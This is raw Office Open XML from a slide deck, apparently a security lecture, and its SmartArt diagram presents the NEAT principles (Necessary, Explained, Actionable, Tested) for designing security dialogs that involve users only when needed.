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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="1318" r:id="rId3"/>
    <p:sldId id="1319" r:id="rId4"/>
    <p:sldId id="979" r:id="rId5"/>
    <p:sldId id="2114" r:id="rId6"/>
    <p:sldId id="948" r:id="rId7"/>
    <p:sldId id="1009" r:id="rId8"/>
    <p:sldId id="980" r:id="rId9"/>
    <p:sldId id="1024" r:id="rId10"/>
    <p:sldId id="1025" r:id="rId11"/>
    <p:sldId id="983" r:id="rId12"/>
    <p:sldId id="993" r:id="rId13"/>
    <p:sldId id="984" r:id="rId14"/>
    <p:sldId id="2113" r:id="rId15"/>
    <p:sldId id="1026" r:id="rId16"/>
    <p:sldId id="2115" r:id="rId17"/>
    <p:sldId id="1028" r:id="rId18"/>
    <p:sldId id="1030" r:id="rId19"/>
    <p:sldId id="1031" r:id="rId20"/>
    <p:sldId id="1032" r:id="rId21"/>
    <p:sldId id="1014" r:id="rId22"/>
    <p:sldId id="416" r:id="rId23"/>
    <p:sldId id="417" r:id="rId24"/>
    <p:sldId id="418" r:id="rId25"/>
    <p:sldId id="2112" r:id="rId26"/>
    <p:sldId id="420" r:id="rId27"/>
    <p:sldId id="421" r:id="rId28"/>
    <p:sldId id="726" r:id="rId29"/>
    <p:sldId id="727" r:id="rId30"/>
    <p:sldId id="422" r:id="rId31"/>
    <p:sldId id="42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287"/>
    <p:restoredTop sz="94608"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="41" d="100"/>
          <a:sy n="41" d="100"/>
        </p:scale>
        <p:origin x="192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20F0EA-EF78-43E3-BBA5-1E322C2601CD}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/h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EC06C0-328C-46AB-813C-0767F786D4C0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
            <a:t>Philosophy </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8ADF99AC-0E5E-4969-9CB1-8FCC07BFFF28}" type="parTrans" cxnId="{3885137C-9E02-4C2F-A53B-3BA92E67AE05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08F546D6-C2C7-4ABC-A755-23CC8DEF2F33}" type="sibTrans" cxnId="{3885137C-9E02-4C2F-A53B-3BA92E67AE05}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84D36570-FFA9-4FA2-99E4-9D5DFB83F678}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US"/>
            <a:t>Does the user have unique knowledge the system doesn’t?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E2AE3A2C-169B-40EF-A601-4E6FBD9ECC0A}" type="parTrans" cxnId="{A3517692-0F00-4849-9B71-9EF23A21EBC2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{58AE0F21-A46E-4DC5-9DC2-0AA822FE55DD}" type="sibTrans" cxnId="{A3517692-0F00-4849-9B71-9EF23A21EBC2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44B84F88-0944-4A0F-883C-03977F8A62DC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US"/>
            <a:t>Don’t involve user if you don’t have to</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F035915-81CA-4DC5-8237-3BE748475896}" type="parTrans" cxnId="{7D9A1B6A-AD66-4567-9CFA-F2F22A99E077}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23D4AAE2-1F5C-474C-95AB-F641FA4EA51A}" type="sibTrans" cxnId="{7D9A1B6A-AD66-4567-9CFA-F2F22A99E077}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D338311-82DB-4245-A1EC-7AEE58D53AD4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US"/>
            <a:t>If you involve the user, enable them to make the right decision</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B57E565B-520B-491E-A8C0-C8EF3A6C739E}" type="parTrans" cxnId="{B006071D-94CC-4820-A567-D9958F2C91D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{64A04E2F-99D1-4759-81C6-808B6C366ACA}" type="sibTrans" cxnId="{B006071D-94CC-4820-A567-D9958F2C91D9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US"/>
            <a:t>Make sure your security dialogs are NEAT </a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5B156F23-02F8-44D6-BBF1-D74BF8010ACF}" type="parTrans" cxnId="{E1B64373-305D-4BD0-850F-C27059CCCC25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{59111627-7D1A-4333-9922-BDCFA02B41CE}" type="sibTrans" cxnId="{E1B64373-305D-4BD0-850F-C27059CCCC25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{756E260F-B1C7-4045-B8FD-E1F994B5BC98}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" u="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>N</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" dirty="0"/>
            <a:t>ecessary</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
            <a:t>: Can the system take action without the user? </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:rPr>
            <a:t>If the user has no unique knowledge, redesign system.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65B2287A-7966-44B0-85CD-9EF4018F8316}" type="parTrans" cxnId="{60FEDD3D-B65A-4FBD-9138-FFA6297499DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB4765CC-108A-422A-B70C-9F9C400029D0}" type="sibTrans" cxnId="{60FEDD3D-B65A-4FBD-9138-FFA6297499DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E4266D4-6E80-AB41-B38C-0F97CB07B04A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" u="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>E</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" dirty="0"/>
            <a:t>xplained</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3F3DB119-7D9F-EA4F-B6F6-530E3B586D5B}" type="parTrans" cxnId="{B2A18F96-C36D-C84F-B951-B06B4867C7FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1B7D1D7-3365-D34E-B526-E52EC8C831D0}" type="sibTrans" cxnId="{B2A18F96-C36D-C84F-B951-B06B4867C7FE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D59E5B5-B21E-6F47-9BE6-87A6BF5C5994}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" u="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>A</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" dirty="0"/>
            <a:t>ctionable</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
            <a:t>: Can users make good decisions with your UI in both malicious and benign situations? </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{88E98168-0961-5E43-9FEC-B6B6A7D5B68C}" type="parTrans" cxnId="{C1483EB2-3B51-5446-A79A-D93F08AE4313}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{264EE62F-4992-E847-86A8-CA7AC53E4A2D}" type="sibTrans" cxnId="{C1483EB2-3B51-5446-A79A-D93F08AE4313}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38ABE943-395C-9245-B522-B8AF4051F484}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" u="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>T</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" b="1" dirty="0"/>
            <a:t>ested</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" dirty="0"/>
            <a:t>: Test your dialog on a few people who haven’t used the system before -- both malicious and benign situations.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{539C1981-2DD9-784C-B738-2279E506D8A7}" type="parTrans" cxnId="{E79DF660-D456-1D4B-8753-90E3B8B79A18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{331D8E7F-CA0B-AE45-B1D4-899025BD8606}" type="sibTrans" cxnId="{E79DF660-D456-1D4B-8753-90E3B8B79A18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D060CF02-0360-CE45-95E7-B59B92A43F91}" type="pres">
      <dgm:prSet presAssocID="{8020F0EA-EF78-43E3-BBA5-1E322C2601CD}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2F932BEB-81C4-DC4B-8978-BD6A4F771931}" type="pres">
      <dgm:prSet presAssocID="{09EC06C0-328C-46AB-813C-0767F786D4C0}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{37CCEBAF-9C40-8C4A-8108-27B4FBF22A32}" type="pres">
      <dgm:prSet presAssocID="{09EC06C0-328C-46AB-813C-0767F786D4C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B70E8E7-304C-1F45-8C38-7F84A799A434}" type="pres">
      <dgm:prSet presAssocID="{09EC06C0-328C-46AB-813C-0767F786D4C0}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{220BFA95-7C5B-F043-AFF2-377DFA008C10}" type="pres">
      <dgm:prSet presAssocID="{08F546D6-C2C7-4ABC-A755-23CC8DEF2F33}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6179F8BD-2928-7A42-AD4C-0EDE0887B300}" type="pres">
      <dgm:prSet presAssocID="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3A7DC8CB-5C1F-654A-A4CB-19C38FEEE858}" type="pres">
      <dgm:prSet presAssocID="{A3CDEFE2-6073-4719-80F9-D88C321FEA2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1E1AEE2-9E6A-754C-981A-E560A24E24A5}" type="pres">
      <dgm:prSet presAssocID="{A3CDEFE2-6073-4719-80F9-D88C321FEA2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006071D-94CC-4820-A567-D9958F2C91D9}" srcId="{09EC06C0-328C-46AB-813C-0767F786D4C0}" destId="{0D338311-82DB-4245-A1EC-7AEE58D53AD4}" srcOrd="2" destOrd="0" parTransId="{B57E565B-520B-491E-A8C0-C8EF3A6C739E}" sibTransId="{64A04E2F-99D1-4759-81C6-808B6C366ACA}"/>
    <dgm:cxn modelId="{60FEDD3D-B65A-4FBD-9138-FFA6297499DD}" srcId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" destId="{756E260F-B1C7-4045-B8FD-E1F994B5BC98}" srcOrd="0" destOrd="0" parTransId="{65B2287A-7966-44B0-85CD-9EF4018F8316}" sibTransId="{EB4765CC-108A-422A-B70C-9F9C400029D0}"/>
    <dgm:cxn modelId="{4F554C41-C042-264C-B1D9-D72E17A2FDDC}" type="presOf" srcId="{1E4266D4-6E80-AB41-B38C-0F97CB07B04A}" destId="{A1E1AEE2-9E6A-754C-981A-E560A24E24A5}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{E79DF660-D456-1D4B-8753-90E3B8B79A18}" srcId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" destId="{38ABE943-395C-9245-B522-B8AF4051F484}" srcOrd="3" destOrd="0" parTransId="{539C1981-2DD9-784C-B738-2279E506D8A7}" sibTransId="{331D8E7F-CA0B-AE45-B1D4-899025BD8606}"/>
    <dgm:cxn modelId="{3E697F66-2A1A-9141-8693-AB3814CFEB71}" type="presOf" srcId="{44B84F88-0944-4A0F-883C-03977F8A62DC}" destId="{DB70E8E7-304C-1F45-8C38-7F84A799A434}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{7D9A1B6A-AD66-4567-9CFA-F2F22A99E077}" srcId="{09EC06C0-328C-46AB-813C-0767F786D4C0}" destId="{44B84F88-0944-4A0F-883C-03977F8A62DC}" srcOrd="1" destOrd="0" parTransId="{8F035915-81CA-4DC5-8237-3BE748475896}" sibTransId="{23D4AAE2-1F5C-474C-95AB-F641FA4EA51A}"/>
    <dgm:cxn modelId="{E1B64373-305D-4BD0-850F-C27059CCCC25}" srcId="{8020F0EA-EF78-43E3-BBA5-1E322C2601CD}" destId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" srcOrd="1" destOrd="0" parTransId="{5B156F23-02F8-44D6-BBF1-D74BF8010ACF}" sibTransId="{59111627-7D1A-4333-9922-BDCFA02B41CE}"/>
    <dgm:cxn modelId="{3885137C-9E02-4C2F-A53B-3BA92E67AE05}" srcId="{8020F0EA-EF78-43E3-BBA5-1E322C2601CD}" destId="{09EC06C0-328C-46AB-813C-0767F786D4C0}" srcOrd="0" destOrd="0" parTransId="{8ADF99AC-0E5E-4969-9CB1-8FCC07BFFF28}" sibTransId="{08F546D6-C2C7-4ABC-A755-23CC8DEF2F33}"/>
    <dgm:cxn modelId="{7EADB57C-1A5E-D147-8060-5F06970FF58F}" type="presOf" srcId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" destId="{3A7DC8CB-5C1F-654A-A4CB-19C38FEEE858}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{DE3AB68A-1B59-1546-9FB9-422C843BA205}" type="presOf" srcId="{09EC06C0-328C-46AB-813C-0767F786D4C0}" destId="{37CCEBAF-9C40-8C4A-8108-27B4FBF22A32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A3517692-0F00-4849-9B71-9EF23A21EBC2}" srcId="{09EC06C0-328C-46AB-813C-0767F786D4C0}" destId="{84D36570-FFA9-4FA2-99E4-9D5DFB83F678}" srcOrd="0" destOrd="0" parTransId="{E2AE3A2C-169B-40EF-A601-4E6FBD9ECC0A}" sibTransId="{58AE0F21-A46E-4DC5-9DC2-0AA822FE55DD}"/>
    <dgm:cxn modelId="{B2A18F96-C36D-C84F-B951-B06B4867C7FE}" srcId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" destId="{1E4266D4-6E80-AB41-B38C-0F97CB07B04A}" srcOrd="1" destOrd="0" parTransId="{3F3DB119-7D9F-EA4F-B6F6-530E3B586D5B}" sibTransId="{A1B7D1D7-3365-D34E-B526-E52EC8C831D0}"/>
    <dgm:cxn modelId="{C1483EB2-3B51-5446-A79A-D93F08AE4313}" srcId="{A3CDEFE2-6073-4719-80F9-D88C321FEA23}" destId="{3D59E5B5-B21E-6F47-9BE6-87A6BF5C5994}" srcOrd="2" destOrd="0" parTransId="{88E98168-0961-5E43-9FEC-B6B6A7D5B68C}" sibTransId="{264EE62F-4992-E847-86A8-CA7AC53E4A2D}"/>
    <dgm:cxn modelId="{39A0ADC0-1EDA-FE47-8457-730FBFB4BF9A}" type="presOf" srcId="{0D338311-82DB-4245-A1EC-7AEE58D53AD4}" destId="{DB70E8E7-304C-1F45-8C38-7F84A799A434}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{BCA313CF-1498-8D46-B802-03D1B8C1F546}" type="presOf" srcId="{84D36570-FFA9-4FA2-99E4-9D5DFB83F678}" destId="{DB70E8E7-304C-1F45-8C38-7F84A799A434}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{9EEF3BD9-FC36-0E47-B650-FD8589CE145E}" type="presOf" srcId="{756E260F-B1C7-4045-B8FD-E1F994B5BC98}" destId="{A1E1AEE2-9E6A-754C-981A-E560A24E24A5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{999E38EC-F971-6145-9401-D6DEC186E557}" type="presOf" srcId="{8020F0EA-EF78-43E3-BBA5-1E322C2601CD}" destId="{D060CF02-0360-CE45-95E7-B59B92A43F91}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{E9F790FA-EF6B-C942-B62C-FB93892C0002}" type="presOf" srcId="{3D59E5B5-B21E-6F47-9BE6-87A6BF5C5994}" destId="{A1E1AEE2-9E6A-754C-981A-E560A24E24A5}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{B8E13BFD-F8F8-4941-BCB9-E478179C3D39}" type="presOf" srcId="{38ABE943-395C-9245-B522-B8AF4051F484}" destId="{A1E1AEE2-9E6A-754C-981A-E560A24E24A5}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{9B0E64FC-9F94-7348-B303-DA9F248FA716}" type="presParOf" srcId="{D060CF02-0360-CE45-95E7-B59B92A43F91}" destId="{2F932BEB-81C4-DC4B-8978-BD6A4F771931}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{FE907916-5DD6-A742-AD38-E1C58422303D}" type="presParOf" srcId="{2F932BEB-81C4-DC4B-8978-BD6A4F771931}" destId="{37CCEBAF-9C40-8C4A-8108-27B4FBF22A32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{11E9422D-F523-904D-A970-3FD2355E7EFD}" type="presParOf" srcId="{2F932BEB-81C4-DC4B-8978-BD6A4F771931}" destId="{DB70E8E7-304C-1F45-8C38-7F84A799A434}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{8C81BE4C-109F-B548-B147-97415175D6B8}" type="presParOf" srcId="{D060CF02-0360-CE45-95E7-B59B92A43F91}" destId="{220BFA95-7C5B-F043-AFF2-377DFA008C10}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{C64C4461-4EE3-1D41-9F97-9F398959C6E8}" type="presParOf" srcId="{D060CF02-0360-CE45-95E7-B59B92A43F91}" destId="{6179F8BD-2928-7A42-AD4C-0EDE0887B300}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{5291E394-667C-644A-9D2E-64D244653714}" type="presParOf" srcId="{6179F8BD-2928-7A42-AD4C-0EDE0887B300}" destId="{3A7DC8CB-5C1F-654A-A4CB-19C38FEEE858}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{CE5AB36E-331A-FE41-B7EA-A2D737AE0EDE}" type="presParOf" srcId="{6179F8BD-2928-7A42-AD4C-0EDE0887B300}" destId="{A1E1AEE2-9E6A-754C-981A-E560A24E24A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CEBAF-9C40-8C4A-8108-27B4FBF22A32}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="50" y="58579"/>
          <a:ext cx="4860674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 dirty="0"/>
            <a:t>Philosophy </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="50" y="58579"/>
        <a:ext cx="4860674" cy="576000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB70E8E7-304C-1F45-8C38-7F84A799A434}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="50" y="634579"/>
          <a:ext cx="4860674" cy="348271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2000" kern="1200"/>
            <a:t>Does the user have unique knowledge the system doesn’t?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2000" kern="1200"/>
            <a:t>Don’t involve user if you don’t have to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2000" kern="1200"/>
            <a:t>If you involve the user, enable them to make the right decision</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="50" y="634579"/>
        <a:ext cx="4860674" cy="3482718"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3A7DC8CB-5C1F-654A-A4CB-19C38FEEE858}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5541220" y="58579"/>
          <a:ext cx="4860674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/>
            <a:t>Make sure your security dialogs are NEAT </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5541220" y="58579"/>
        <a:ext cx="4860674" cy="576000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A1E1AEE2-9E6A-754C-981A-E560A24E24A5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5541220" y="634579"/>
          <a:ext cx="4860674" cy="348271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2000" b="1" u="none" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>N</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
            <a:t>ecessary</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>: Can the system take action without the user? </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="en-US" sz="2000" kern="1200" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
            </a:rPr>
            <a:t>If the user has no unique knowledge, redesign system.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2000" b="1" u="none" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>E</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
            <a:t>xplained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2000" b="1" u="none" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>A</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" sz="2000" b="1" kern="1200" dirty="0"/>
            <a:t>ctionable</a:t>
          </a:r>
          <a:r>
            <a:rPr kumimoji="1" lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>: Can users make good decisions with your UI in both malicious and benign situations?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2000" b="1" u="none" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>T</a:t>
          </a:r>
          <a:r>
